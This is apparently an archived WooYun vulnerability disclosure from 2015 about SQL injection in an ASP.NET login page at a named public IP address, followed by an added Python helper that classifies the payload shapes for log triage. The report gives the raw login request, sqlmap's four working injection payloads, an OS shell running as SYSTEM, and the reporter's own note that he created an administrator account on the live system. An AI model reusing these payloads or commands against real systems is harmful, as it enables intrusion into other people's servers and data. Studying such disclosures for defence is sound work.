WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online reader --------- http://drop.zone.ci/
2015-06-23: Details were sent to the vendor and are awaiting vendor handling.
2015-06-28: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Address: http://218.108.255.183/UserLogin/Login.aspx
POST injection; captured login request:
POST /UserLogin/Login.aspx HTTP/1.1
Host: 218.108.255.183
Proxy-Connection: keep-alive
Content-Length: 204
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://218.108.255.183
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://218.108.255.183/UserLogin/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hfivawitao0pgzzcqewfst45; JSESSIONID=1wx3gyfq326t51xahj4mziimtt; ems.userName=admin; ems.rememberName=true

__VIEWSTATE=%2FwEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw%2BBISbkwo%3D&__EVENTVALIDATION=%2FwEWBAKHhpR8Au3yj58JAvfEm%2BEEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0%3D&hidSubmit=Login&txt_UserName=aaa&txt_Pwd=aaa
POST injection, with DBA privileges (sqlmap output):
sts:
---
Place: POST
Parameter: txt_UserName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw+BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm+EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=aaa' AND 5524=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(102)+CHAR(116)+CHAR(58)+(SELECT (CASE WHEN (5524=5524) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(104)+CHAR(111)+CHAR(58))) AND 'gqgC'='gqgC&txt_Pwd=aaa

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw+BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm+EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=-6445' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(105)+CHAR(102)+CHAR(116)+CHAR(58)+CHAR(98)+CHAR(108)+CHAR(72)+CHAR(108)+CHAR(65)+CHAR(104)+CHAR(100)+CHAR(110)+CHAR(81)+CHAR(79)+CHAR(58)+CHAR(105)+CHAR(104)+CHAR(111)+CHAR(58),NULL,NULL,NULL-- &txt_Pwd=aaa

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw+BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm+EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=aaa'; WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw+BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm+EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=aaa' WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa
---
[16:04:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:04:03] [INFO] testing if current user is DBA
current user is DBA: True
[16:04:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:04:03] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\218.108.255.183'
[*] shutting down at 16:04:03
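The four techniques sqlmap reports above all land in the same field, txt_UserName, of a form-encoded login body. As an added triage helper (not part of the report or the vendor's application), the following classifies that field by those four payload shapes over constructed request bodies; the VIEWSTATE values, the make_body helper and the sample usernames are assumptions built for the example, and a match is a signal for log review or WAF tuning, not proof of exploitation.

```python
import re
from urllib.parse import parse_qs, urlencode

# Added example, not from the report: classify the txt_UserName field of a
# captured Login.aspx POST body by the injection shapes sqlmap listed
# (error-based CONVERT/CHAR, UNION SELECT, stacked WAITFOR, time-based WAITFOR).
SIGNATURES = (
    ("error-based", re.compile(r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(", re.I | re.S)),
    ("union", re.compile(r"UNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("stacked", re.compile(r";\s*WAITFOR\s+DELAY", re.I)),
    ("time-based", re.compile(r"WAITFOR\s+DELAY\s+'\d+:\d+:\d+'", re.I)),
)

def classify_login_post(body: str, field: str = "txt_UserName") -> list:
    """Return the signature names matched by `field` in a form-encoded body."""
    params = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+'
    value = " ".join(params.get(field, []))
    return [name for name, rx in SIGNATURES if rx.search(value)]

def make_body(username: str) -> str:
    """Constructed body in the shape of the captured request (fake VIEWSTATE)."""
    return urlencode({
        "__VIEWSTATE": "CONSTRUCTED_VIEWSTATE",
        "__EVENTVALIDATION": "CONSTRUCTED_EVENTVALIDATION",
        "hidSubmit": "Login",
        "txt_UserName": username,
        "txt_Pwd": "aaa",
    })

# Constructed samples: one benign login, one legitimate name containing a
# quote, and one shortened instance of each payload shape from the sqlmap output.
SAMPLES = {
    "benign": make_body("aaa"),
    "quote-in-name": make_body("O'Brien"),
    "error-based": make_body("aaa' AND 1=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(58))) AND 'x'='x"),
    "union": make_body("-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- "),
    "stacked": make_body("aaa'; WAITFOR DELAY '0:0:5'--"),
    "time-based": make_body("aaa' WAITFOR DELAY '0:0:5'--"),
}

def triage_all(samples=SAMPLES) -> dict:
    """Map each sample label to the list of signatures its username matched."""
    return {label: classify_login_post(body) for label, body in samples.items()}

if __name__ == "__main__":
    for label, hits in triage_all().items():
        print(f"{label:14s} -> {hits or ['no signature']}")
```

A stacked payload also matches the time-based signature because it carries the same WAITFOR DELAY; the legitimate O'Brien login matches nothing, which is why the fix is a parameterized login query rather than quote filtering.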
With DBA privileges, CMD commands can be executed directly:
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[16:11:59] [INFO] the SQL query used returns 1 entries
[16:12:00] [INFO] retrieved: "nt authority\\\\system"
command standard output [1]:
[*] nt authority\system
os-shell>
An administrator account can be added; I added one, wooyun/test123. Listing the databases:
available databases [7]:
[*] master
[*] model
[*] msdb
[*] RMSS
[*] RMSS20140825
[*] RMSS_TEST
[*] tempdb
Table names (sqlmap enumerated 247 tables in the RMSS database):
As described above.
Severity: No impact (vendor ignored)
Ignored at: 2015-06-28 15:50
Vulnerability Rank: 4 (WooYun rating)
None yet.